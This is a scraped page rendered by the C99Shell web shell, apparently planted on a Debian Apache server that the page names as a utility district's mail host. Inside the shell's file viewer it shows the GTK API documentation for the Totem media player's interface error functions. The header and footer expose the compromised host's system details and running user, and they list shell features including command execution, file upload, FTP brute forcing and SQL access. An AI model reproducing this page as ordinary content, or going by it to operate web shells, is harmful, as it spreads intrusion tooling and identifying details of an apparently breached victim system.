!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/gtk-doc/html/totem/   drwxr-xr-x
Free 130.04 GB of 142.11 GB (91.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     totem-Interface.html (9.28 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Interface

Interface

Interface — interface utility/loading/error functions

Stability Level

Unstable, unless otherwise indicated

Synopsis


#include <totem-interface.h>

void                totem_interface_error               (const char *title,
                                                         const char *reason,
                                                         GtkWindow *parent);
void                totem_interface_error_blocking      (const char *title,
                                                         const char *reason,
                                                         GtkWindow *parent);
void                totem_interface_error_with_link     (const char *title,
                                                         const char *reason,
                                                         const char *uri,
                                                         const char *label,
                                                         GtkWindow *parent,
                                                         Totem *totem);

Description

A collection of interface utility functions, for loading interfaces and displaying errors.

Details

totem_interface_error ()

void                totem_interface_error               (const char *title,
                                                         const char *reason,
                                                         GtkWindow *parent);

Display a modal error dialogue with title as its primary error text, and reason as its secondary text.

title :

the error title

reason :

the error reason (secondary text)

parent :

the error dialogue's parent GtkWindow

totem_interface_error_blocking ()

void                totem_interface_error_blocking      (const char *title,
                                                         const char *reason,
                                                         GtkWindow *parent);

Display a modal error dialogue like totem_interface_error() which blocks until the user has dismissed it.

title :

the error title

reason :

the error reason (secondary text)

parent :

the error dialogue's parent GtkWindow

totem_interface_error_with_link ()

void                totem_interface_error_with_link     (const char *title,
                                                         const char *reason,
                                                         const char *uri,
                                                         const char *label,
                                                         GtkWindow *parent,
                                                         Totem *totem);

Display a modal error dialogue like totem_interface_error(), but add a button which will open uri in a browser window.

title :

the error title

reason :

the error reason (secondary text)

uri :

the URI to open

label :

a label for the URI's button, or NULL to use uri as the label

parent :

the error dialogue's parent GtkWindow

totem :

a TotemObject

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0203 ]--